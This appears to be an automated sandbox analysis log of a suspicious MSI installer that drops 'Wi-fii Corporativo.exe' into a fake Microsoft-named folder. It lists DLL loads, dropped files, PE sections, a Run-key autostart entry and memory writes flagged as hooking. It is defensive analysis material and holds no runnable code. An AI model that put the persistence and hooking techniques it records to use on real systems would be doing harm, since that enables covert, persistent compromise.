Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: cef_frame.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: magnification.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: idndl.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: cef_frame.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: magnification.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: idndl.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: cef_frame.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: magnification.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: idndl.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: fiF8mxzUfw.msi

Static file information: File size 23667712 > 1048576

Source:	Binary string: E:\workplace\AndroidEmulator\7KMarket_Git_Release64\Basic\Client\Output\BinFinal\AppMarket\cef_frame_render.pdb source: Wi-fii Corporativo.exe, 00000004.00000000.2061984355.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000007.00000000.2494433940.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000007.00000002.2700277175.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000008.00000000.2582056760.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000008.00000002.3684850513.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: fiF8mxzUfw.msi, MSI2AE0.tmp.1.dr, MSI28F8.tmp.1.dr, MSI2995.tmp.1.dr, MSI2A05.tmp.1.dr, 6f262c.msi.1.dr
Source:	Binary string: E:\workplace\AndroidEmulator\7KMarket_Git_Release64\Basic\Client\Output\BinFinal\AppMarket\cef_frame_render.pdb source: Wi-fii Corporativo.exe, 00000004.00000000.2061984355.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000007.00000000.2494433940.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000007.00000002.2700277175.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000008.00000000.2582056760.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000008.00000002.3684850513.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe.1.dr

Source: initial sample

Static PE information: section where entry point is pointing to: .z}'

Source: cef_frame.dll.1.dr	Static PE information: section name: .didata
Source: cef_frame.dll.1.dr	Static PE information: section name: .E{7
Source: cef_frame.dll.1.dr	Static PE information: section name: .< a
Source: cef_frame.dll.1.dr	Static PE information: section name: .z}'
Source: MSI28F8.tmp.1.dr	Static PE information: section name: .fptable
Source: MSI2995.tmp.1.dr	Static PE information: section name: .fptable
Source: MSI29D5.tmp.1.dr	Static PE information: section name: .fptable
Source: MSI2A05.tmp.1.dr	Static PE information: section name: .fptable
Source: MSI2AE0.tmp.1.dr	Static PE information: section name: .fptable

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Code function: 7_2_00511986 push ecx; ret		7_2_00511999
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Code function: 8_2_00511986 push ecx; ret		8_2_00511999

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI28F8.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2995.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2AE0.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\cef_frame.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI29D5.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2A05.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI28F8.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2995.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2AE0.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI29D5.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2A05.tmp	Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wi-fii Corporativo.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wi-fii Corporativo.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wi-fii Corporativo.exe			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 7732 base: EE0005 value: E9 8B 2F 01 76	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 7732 base: 76EF2F90 value: E9 7A D0 FE 89	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 7732 base: EF0005 value: E9 2B BA FC 75	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 7732 base: 76EBBA30 value: E9 DA 45 03 8A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 7732 base: F00008 value: E9 8B 8E 00 76	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 7732 base: 76F08E90 value: E9 80 71 FF 89	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 7732 base: 1030005 value: E9 8B 4D A4 74	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 7732 base: 75A74D90 value: E9 7A B2 5B 8B	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 7732 base: 1040005 value: E9 EB EB A4 74	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 7732 base: 75A8EBF0 value: E9 1A 14 5B 8B	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 7732 base: 1050005 value: E9 8B 8A E0 74	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 7732 base: 75E58A90 value: E9 7A 75 1F 8B	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 7732 base: 1060005 value: E9 2B 02 E2 74	Jump to behavior
